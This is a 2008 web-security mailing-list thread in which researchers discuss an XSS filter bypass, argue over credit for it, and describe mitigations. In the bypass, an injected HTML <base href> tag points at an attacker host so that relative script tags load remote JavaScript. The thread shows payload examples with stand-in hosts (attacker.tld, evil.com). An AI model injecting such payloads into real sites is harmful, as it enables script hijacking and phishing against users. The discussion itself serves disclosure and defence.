RE: [WEB SECURITY] Nice little XSS trick

["Arshan Dabirsiaghi" <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>]

Yeah, and a typical, unfortunate reaction from sirdarkcat (not typical
of him, just of the security community in general). It's different
because it'd be trivially easy for the browser vendors to prevent the
javascript: technique, but almost impossible to fix this variant.

Arshan

-----Original Message-----
From: David Byrne [mailto:davidribyrne@xxxxxxxxx] 
Sent: Wednesday, July 16, 2008 3:30 PM
To: Arshan Dabirsiaghi; Amit Klein
Cc: websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] Nice little XSS trick

I need to indulge my vanity :) I posted something similar almost a year
ago. Granted, I didn't take the time to write it up nicely. 

http://sla.ckers.org/forum/read.php?2,14751




----- Original Message ----
From: Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
To: Amit Klein <aksecurity@xxxxxxxxx>
Cc: websecurity@xxxxxxxxxxxxx
Sent: Wednesday, July 16, 2008 8:45:28 AM
Subject: RE: [WEB SECURITY] Nice little XSS trick

You're too nice - no need to apologize or defer credit. You discovered
it on your own. If you can't find it in Google, CWE or the OWASP Testing
Guide, I frankly don't think you can call it public knowledge, and
therefore it should be publicly discussed.

Arshan

-----Original Message-----
From: Amit Klein [mailto:aksecurity@xxxxxxxxx] 
Sent: Wednesday, July 16, 2008 10:34 AM
To: Arshan Dabirsiaghi
Cc: websecurity@xxxxxxxxxxxxx
Subject: Re: [WEB SECURITY] Nice little XSS trick

Hi Arshan+list,

Indeed - the same vulnerability. I did google for it, but I didn't
pick up your site (and RSnake's cheat sheet doesn't list it - now I
know why).

Anyway - sorry. You deserve full credit for it, of course.

Thanks for the correction and the further information,
-Amit


On 7/16/08, Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
wrote:
>
>
>
> http://i8jesus.com/?p=10 (Jan 2008)
>
>
> I also presented this vector last year at OWASP San Jose when I
demo'ed
> AntiSamy as an example of dangerous content that isn't malicious code
on its
> own. That's one of the selling points of AntiSamy - it stops not only
XSS
> (well, we hope) but also prevents phishing attacks that abuse
HTML/CSS.
>
>
>
> I talked about it with RSnake afterwards and he had some crazy reason
for
> not putting it on his cheatsheet - claimed it was too much like the
<base
> href="javascript:foo();//"> vector. As noted on my blog post, IE7 is
longer
> (according to policy) supposed to be honoring <base> tags outside of
<HEAD>,
> but FF is still vulnerable. You could use this to hijack anything -
> stylesheets (more XSS/phishing), images, scripts, etc. The only thing
<base>
> won't help you steal as far as resources is anything gathered in
JavaScript.
>
>
>
> I think some of the big players had this figured out already (or more
> likely, just got really lucky). MySpace takes <base href> values,
base64
> encodes them, and redirects them through another domain. The flow is
like
> this for them:
>
>
>
> 1.       User puts in <base href="http://evil.com";>
>
> 2.       Str = base64("http://evil.com";)
>
> 3.       Profile = <base
> href="http://msplinks.com/redir?<base64encodedStr>
>
>
>
> Maybe there's a way to abuse that, but I don't think so. And eBay
doesn't
> have any relative links after user content, at least when I first
looked at
> this last year. They probably both just got lucky. =]
>
>
>
> Arshan
>
>
>
> ---------- Previous message ----------
>
> From: Amit Klein <aksecurity@xxxxxxxxx>
>
> Date: Tue, Jul 15, 2008 at 7:33 AM
>
> Subject: [WEB SECURITY] Nice little XSS trick
>
> To: Web Security <websecurity@xxxxxxxxxxxxx>
>
>
>
>
>
> Hi list
>
>
>
> Recently I've been thinking about bypassing anti-XSS filters, and a
nice
> little trick occurred to me, which I haven't seen anywhere (e.g. it's
not on
> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does
mention
> BASe, but not the trick I describe here). The idea is to use the HTML
BASE
> tag to force loading of JS code from the attacker's host. Consider a
page
> with XSS vulnerability such as:
>
>
>
> <html>
>
> ...
>
> ***XSS code may be embedded here***
>
> ...
>
> <script src="/foo/bar.js"></script>
>
> ...
>
> </html>
>
>
>
> Now, an attacker can inject <base
> href="http://www.attacker.tld/";>, and next thing you know,
> the browser (IE, at least) loads the JS from
> http://www.attacker.tld/foo/bar.js... And the beauty is
> that there's no "explicit" JS code involved in the payload itself.
>
>
>
> Note that according to the HTML standard, BASE should be placed in the
HEAD
> section
> (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
> This is indeed observed by FF 2, but not by IE (checked IE6).
>
>
>
> Thanks,
>
> -Amit

------------------------------------------------------------------------
----
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA


      

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA